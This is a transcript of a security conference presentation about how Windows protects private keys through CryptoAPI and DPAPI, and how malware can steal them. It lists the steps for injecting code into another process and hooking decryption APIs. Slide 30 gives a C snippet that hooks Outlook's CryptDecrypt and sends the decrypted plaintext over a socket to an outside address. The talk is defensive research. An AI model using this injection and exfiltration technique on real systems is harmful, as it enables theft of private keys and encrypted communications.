1 / 33

Catch the key if you can

Catch the key if you can. Aurélien BORDES Éric DETOISIEN. Summary. Introduction What keys ? CryptoAPI / DPAPI Software protection under Windows Code injection and API Hooking Conclusion. Summary. Introduction What keys? CryptoAPI / DPAPI Software protection under Windows

reuben-simmons
Download Presentation

Catch the key if you can

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Catch the key if you can Aurélien BORDESÉric DETOISIEN

  2. Summary • Introduction • What keys ? • CryptoAPI / DPAPI • Software protection under Windows • Code injection and API Hooking • Conclusion

  3. Summary • Introduction • What keys? • CryptoAPI / DPAPI • Software protection under Windows • Code injection and API Hooking • Conclusion

  4. Introduction • More and more PKI (Public Key Infrastructure) deployments • Certificates used in digital signature, crypt/decrypt operations and authentication • Data protection in this game is critical • What is the security behind the use of this technology in Microsoft environment?

  5. Summary • Introduction • What keys? • CryptoAPI / DPAPI • Software protection under Windows • Code injection and API Hooking • Conclusion

  6. What keys ? • RSA is an asymmetric-key cryptosystem • It uses two keys : • a public key used for verification or encryption • a private key used for signing or decryption • The public key must be widely distributed (X509 certificates) • The private key must be kept by the owner as a protected form (software or hardware)

  7. Summary • Introduction • What keys? • CryptoAPI / DPAPI • Software protection under Windows • Code injection and API Hooking • Conclusion

  8. CryptoAPI Provide cryptographic functions • Base cryptographic functions • Context functions • Key exchange functions • Certificate encode/decode functions • Encrypt or decrypt • Hash • Certificate store functions • Simplified message functions • Low-level message functions

  9. CSP • Cryptographic Service Provider • Independent modules • Implement the cryptographic functions • Provide protection for private keys • Microsoft CSP: based on DPAPI • Third-party CSP: based on hardware devices

  10. CSP • Cryptographic Provider Types: • PROV_RSA_FULL • PROV_RSA_AES • PROV_RSA_SCHANNEL • PROV_DH_SCHANNEL

  11. Microsoft CSP • PROV_RSA_FULL • Microsoft Base Cryptographic Provider • Microsoft Enhanced/Strong Cryptographic Provider • PROV_RSA_AES • Microsoft AES Cryptographic Provider • PROV_RSA_SCHANNEL • Microsoft RSA/Schannel Cryptographic Provider • PROV_DH_SCHANNEL • Microsoft DSS and Diffie-Hellman/Schannel Cryptographic Provider

  12. DPAPI • Data Protection Application Programming Interface • Provide OS-level data protection services to user and system • Protection based on encryption (3DES) • Main idea : session keys are never stored but are reconstructed for the encryption or decryption operations

  13. DPAPI • Generation of a strong secret protected by the user’s password (PKCS#5: PBKDF2, 3DES and SHA-1) Stored in the user’s profile: c:\Documents and Settings\<username>\Application Data\Microsoft\Protect\<sid user>\

  14. DPAPI Optional: additional password specified by the user Protected with user credential Master Key « Some random data » Applicationentropy User entropy Session key generated DPAPI Blob GUID Master key « Some random data » Clear Encrypted

  15. CryptProtectData BOOL WINAPI CryptProtectData ( DATA_BLOB *pDataIn, LPCWSTR szDataDescr, DATA_BLOB *pOptionalEntropy, PVOID pvReserved, CRYPTPROTECT_PROMPTSTRUCT *pPromptStruct, DWORD dwFlags, DATA_BLOB *pDataOut) • dwFlags (CRYPTPROTECT_LOCAL_MACHINE) : all local users can unprotect data. Machine keys are protected with this flag

  16. CryptUnprotectData BOOL WINAPI CryptUnprotectData ( DATA_BLOB *pDataIn, LPCWSTR *ppszDataDescr, DATA_BLOB *pOptionalEntropy, PVOID pvReserved, CRYPTPROTECT_PROMPTSTRUCT *pPromptStruct, DWORD dwFlags, DATA_BLOB *pDataOut)

  17. DPAPI Protection level of DPAPI • Low : protection/unprotection operations of data is transparent (flag CRYPTPROTECT_PROMPTSTRUCTno set) • Medium : user confirmation required for protection/unprotection operations • High : additional user entropy required : user must submit password for protection/unprotection operations

  18. Summary • Introduction • What keys? • CryptoAPI / DPAPI • Software protection under Windows • Code injection and API Hooking • Conclusion

  19. Software protection under Windows • Protection of private keys with Microsoft’s CSP is based on DPAPI • Same levels of protection (low, medium, high) • User private keys are protected with DPAPI and stored in the user’s profile: C:\Documents and Settings\<username>\Application Data\Microsoft\Crypto\RSA\<sid user>\ • Machine private keys: • C:\Documents and Settings\All Users\Application Data\Microsoft\Crypto\RSA\MachineKeys\

  20. Software protection under Windows • A trojan can read files (protected private keys) and use DPAPI functions to unprotect the keys • Work only (quiet, no message) if protection level is low (default) • Demo • And with medium/high level protection? Perhaps with old school code injection and API Hooking

  21. Delete the keys • When you remove your certificate, the associated private key is not delete on the disk

  22. Summary • Introduction • What keys? • CryptoAPI / DPAPI • Software protection under Windows • Code injection and API Hooking • Conclusion

  23. Code injection and API Hooking • Code injection in Win32 process • OpenProcess • VirtualAllocEx • WriteProcessMemory • CreateRemoteThread • The trojan code is injected in the target process • Possibility to hook interesting API

  24. Code injection and API Hooking • API Hooking in the target process • Save first API instructions • Patch API with a JMP to our injected code • Call saved instructions and original API • Interesting API to hook • RtlDecryptMemory (SystemFunction041) in Advapi32.dll • CertSerializeCertificateStoreElement

  25. Code injection and API Hooking • RtlDecryptMemory NTSTATUS RtlDecryptMemory( PVOID Memory, ULONG MemoryLength, ULONG OptionFlags); • Memory is a pointer to encrypted data (private key) • If the function is successful the decrypted data (plain text private key) can be read at Memory location

  26. Code injection and API Hooking • CertSerializeCertificateStoreElement BOOL WINAPI CertSerializeCertificateStoreElement( PCCERT_CONTEXT pCertContext, DWORD dwFlags, BYTE* pbElement, DWORD* pcbElement ); • typedef struct _CERT_CONTEXT { DWORD dwCertEncodingType; BYTE* pbCertEncoded; DWORD cbCertEncoded; PCERT_INFO pCertInfo; HCERTSTORE hCertStore; } CERT_CONTEXT,*PCERT_CONTEXT; typedef const CERT_CONTEXT *PCCERT_CONTEXT;

  27. Code injection and API Hooking • pbCertEncoded is a pointer to DER encoded certificate • API Hooking is effective to get X509 Certificate and its private key • Demo

  28. Can’t catch the key, but data… • Sometimes, it is impossible to get the key (hardware exportation not possible) • But it is very easy to get the cleartext • All the decryption operations use the CryptDecrypt function • If you hook this function, you got the plaintext data

  29. CryptDecrypt BOOL WINAPI CryptDecrypt( HCRYPTKEY hKey, HCRYPTHASH hHash, BOOL Final, DWORD dwFlags, BYTE* pbData, DWORD* pdwDataLen ); plaintext after decryption

  30. Hooking Outlook SOCKET s; sockaddr_in sa_in; s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); sa_in.sin_family = AF_INET; sa_in.sin_addr.s_addr =inet_addr("192.168.0.1"); sa_in.sin_port = htons(25); connect(s, (SOCKADDR*) & sa_in, sa_in); send(s, (char *)pbData, (int)*pdwDataLen, 0); closesocket(s); OUTLOOK Decryption: SSL/TLS S/MIME CryptoAPI HOOK CryptDecrypt CSP

  31. Summary • Introduction • What keys? • CryptoAPI / DPAPI • Software protection under Windows • Code injection and API Hooking • Conclusion

  32. Conclusion • Private storage on Windows is not secure • Token and smartcard are better but beware the spyware… • No workstation compromise means no compromise of your keys • The security needs to be everywhere

More Related